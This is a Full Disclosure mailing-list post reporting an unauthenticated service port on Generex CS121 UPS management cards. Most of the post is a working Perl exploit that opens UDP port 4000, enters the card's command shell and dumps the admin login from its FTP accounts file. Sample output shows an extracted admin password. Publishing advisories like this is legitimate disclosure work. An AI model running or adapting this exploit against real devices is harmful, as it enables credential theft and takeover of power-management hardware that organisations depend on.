[FD] UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak, ...



UPS Web/SNMP-Manager CS121 by Generex comes with a "service" port enabled by 
default, which makes it possible to bypass any specified login for 
HTTP(S), SNMP or Telnet. 

CS121 is a widely used management card in UPS systems from Legrand, Rittal, 
Eaton, AEG, Masterguard, ...

Attached is a PoC, found and proven on Legrand UPS with different firmware 
releases. If you are hardcore enough, you may also flash your own 
HyNetOS-firmware and take over the world ;-)


./upssearch.pl   $IP

UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010 

Target system parameters (current):
Default Protocol : TCP/IP
Default Driver   : Ethernet
Mac address      : 00-03-05-00-00-00
IP address       : XX.XX.XX.XX
Net Mask         : 255.255.255.192
Default Gateway  : XX.XX.XX.XX
DHCP             : 0.0.0.0
DNS              : 0.0.0.0
Port for tools   : 4000


Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none

Regards.

#!/usr/bin/perl -w
# PoC: talk to the CS121 "service" port (UDP 4000) without any login and
# read the FTP account file from the card's flash.
use strict;
use IO::Socket;
use IO::Select;
use constant MAXBYTES => 1024;
use constant TIMEOUT  => 3;      # seconds to wait for each reply

die "usage: $0 <ip>\n" unless @ARGV;

my $socket = IO::Socket::INET->new( PeerPort  => 4000,
                                    PeerAddr  => $ARGV[0],
                                    Type      => SOCK_DGRAM,
                                    Proto     => 'udp')
    or die "socket: $!\n";
my $select = IO::Select->new($socket);

# recv with a timeout, so a host that stops answering cannot hang the script
sub reply {
    my $inline;
    return undef unless $select->can_read(TIMEOUT);
    $socket->recv($inline, MAXBYTES);
    return $inline;
}

# firmware / ROM version banner
$socket->send("<VERSION>");
my $version = reply();
die "no answer from service port\n" unless defined $version;
print "UPS: $version \n";

# network parameters, including the "Port for tools" itself
$socket->send("show syspar");
my $syspar = reply();
print "$syspar\n" if defined $syspar;

print "Searching login\n";
$socket->send("start");                 # enter the command shell
reply();                                # shell banner/ack, discarded
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt");

# the account file comes back datagram by datagram; stop at the admin entry
while (defined(my $line = reply())) {
    if ($line =~ /admin/i) { print $line; exit; }
}
print "no admin entry found\n";
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/